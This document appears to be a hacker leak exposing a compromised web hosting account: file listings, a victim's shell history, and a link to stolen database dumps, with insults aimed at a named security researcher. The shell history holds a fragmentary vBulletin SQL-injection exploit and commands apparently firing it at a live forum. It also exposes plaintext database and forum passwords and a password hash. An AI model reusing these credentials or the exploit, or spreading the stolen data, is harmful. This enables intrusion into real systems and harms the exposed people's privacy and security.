  825. 35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
  826. 35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
  827. 35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
  828. 35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
  829. [email protected] [/home/nopasara/public_html]# ls -lia
  830. total 2286196
  831. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
  832. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
  833. 35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
  834. 35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
  835. 35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
  836. 35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
  837. 35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
  838. 37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
  839. 35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
  840. 35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
  841. 36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
  842. 35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
  843. 35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
  844. 35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
  845. 35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
  846. 35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  847. 37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
  848. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
  849. 35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
  850. 36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
  851. 35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
  852. 35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
  853. 35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
  854. 35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
  855. 36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
  856. [email protected] [/home/nopasara/public_html/securityguy]# ls -lia
  857. total 5722468
  858. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
  859. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
  860. 36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
  861. 36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
  862. 37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
  863. 36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
  864. 36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
  865. 37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
  866. 36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
  867. 36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
  868. 36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
  869. 36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
  870. 36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
  871. 36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
  872. 36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
  873. 36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
  874. 36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
  875. 36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
  876. 36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
  877. 36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
  878. 36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
  879. 36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
  880. 36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
  881. 36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
  882. 36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
  883. 36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
  884. 36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
  885. 36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
  886. 36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
  887. 36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
  888. 36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
  889. 36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
  890. 36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
  891. 36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
  892. 36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
  893. 36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
  894. 36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
  895. 36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
  896. 36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
  897. 36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
  898. 36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
  899. 36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
  900. 36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
  901. [email protected] [/home/nopasara]# cat .bash_history
  902. #1263692240
  903. cd public_html/
  904. #1263692243
  905. test.php
  906. #1263692248
  907. php test.php
  908. #1263692260
  909. php test.php <?php
  910. #1263692260
  911. print_r('
  912. -----------------------------------------------------------------------------
  913. vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  914. escalation by session hijacking exploit
  915. by rgod
  916. mail: retrog at alice dot it
  917. site: http://retrogod.altervista.org
  918. Works regardless of php.ini settings, you need a Super Moderator account
  919. to copy posts among threads, to be launched while admin is logged in to
  920. the control panel, this will give you full admin privileges
  921. note: this will flood the forum with empty threads even!
  922. -----------------------------------------------------------------------------
  923. ');
  924. #1263692260
  925. if ($argc<7) {
  926. #1263692260
  927. print_r('
  928. -----------------------------------------------------------------------------
  929. Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  930. host: target server (ip/hostname)
  931. path: path to vbulletin
  932. user/pass: you need a moderator account
  933. forumid: existing forum
  934. postid: existing post
  935. Options:
  936. -p[port]: specify a port other than 80
  937. -P[ip:port]: specify a proxy
  938. Example:
  939. php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  940. php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  941. -----------------------------------------------------------------------------
  942. ');
  943. #1263692260
  944. die;
  945. #1263692260
  946. }
  947. #1263692260
  948. /*
  949. #1263692260
  950. vulnerable code in inlinemod.php near lines 185-209:
  951. #1263692260
  952. ...
  953. #1263692260
  954. #1263692260
  955. ->GPC['postids']);
  956. #1263692260
  957. dex => $postid)
  958. #1263692260
  959. dex"] != intval($postid))
  960. {
  961. unset($postids["$index"]);
  962. }
  963. }
  964. if (empty($postids))
  965. {
  966. #1263692279
  967. php test.php
  968. #1263692305
  969. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  970. #1263692308
  971. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  972. #1263692321
  973. php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  974. #1263692381
  975. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  976. #1263692470
  977. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  978. #1263692489
  979. Administrator
  980. #1263692493
  981. Administrator
  982. #1263692496
  983. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  984. #1263692539
  985. cd ..
  986. #1263692540
  987. ls
  988. #1263692547
  989. rm .bash_history
  990. #1263692551
  991. cat .bash_h
  992. #1263692557
  993. exit
  994. #1263831540
  995. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  996. #1263831932
  997. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  998. #1263833103
  999. exit
  1000. #1263832465
  1001. ls -la
  1002. #1263832469
  1003. ls -la
  1004. #1263832491
  1005. vim .bash_history
  1006. #1263832552
  1007. mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  1008. #1263832751
  1009. mysql --help|grep charset
  1010. #1263832754
  1011. mysql --help|grep char
  1012. #1263832908
  1013. cd public_html/
  1014. #1263832909
  1015. ls
  1016. #1263832912
  1017. cd sverdlov.net/
  1018. #1263832912
  1019. ls
  1020. #1263832923
  1021. vim wp-config.php
  1022. #1263837320
  1023. logou
  1024. #1263837322
  1025. logout
  1026. uname -a;w;id
  1027. cd /home/nopasara
  1028. ls -l
  1029. du -hs .
  1030. cd /home/nopasara
  1031. ls -lia
  1032. >> LOL, You're doing it wrong, idiot.
  1033. [email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  1034. leech:204VnKl0pmERM
  1035. [email protected] [/home/nopasara]# ls -l docs
  1036. total 36044
  1037. drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
  1038. drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
  1039. -rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
  1040. -rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  1041. -rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  1042. -rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
  1043. -rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
  1044. -rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
  1045. -rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
  1046. -rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
  1047. -rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  1048. -rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
  1049. -rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  1050. -rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
  1051. -rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
  1052. -rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  1053. -rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  1054. -rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
  1055. -rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  1056. -rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  1057. -rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
  1058. -rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
  1059. -rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
  1060. -rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
  1061. -rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
  1062. -rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
  1063. -rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
  1064. -rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  1065. -rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
  1066. [email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  1067. total 128288
  1068. drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
  1069. drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
  1070. -rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
  1071. -rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
  1072. -rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
  1073. -rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
  1074. -rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
  1075. -rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
  1076. -rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
  1077. -rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
  1078. -rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
  1079. -rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
  1080. -rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
  1081. -rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
  1082. -rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  1083. -rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
  1084. -rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
  1085. -rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
  1086. -rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
  1087. -rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
  1088. -rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
  1089. -rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
  1090. -rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
  1091. -rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
  1092. -rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
  1093. -rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
  1094. -rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
  1095. -rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
  1096. -rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
  1097. -rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
  1098. -rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
  1099. -rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
  1100. -rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
  1101. -rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
  1102. -rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
  1103. -rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
  1104. -rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
  1105. >> Check the URL for database dumps, etc.
  1106. Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  1107. Here's the URL for the various dumps -
  1108. http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  1109. Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.
Comments powered by Disqus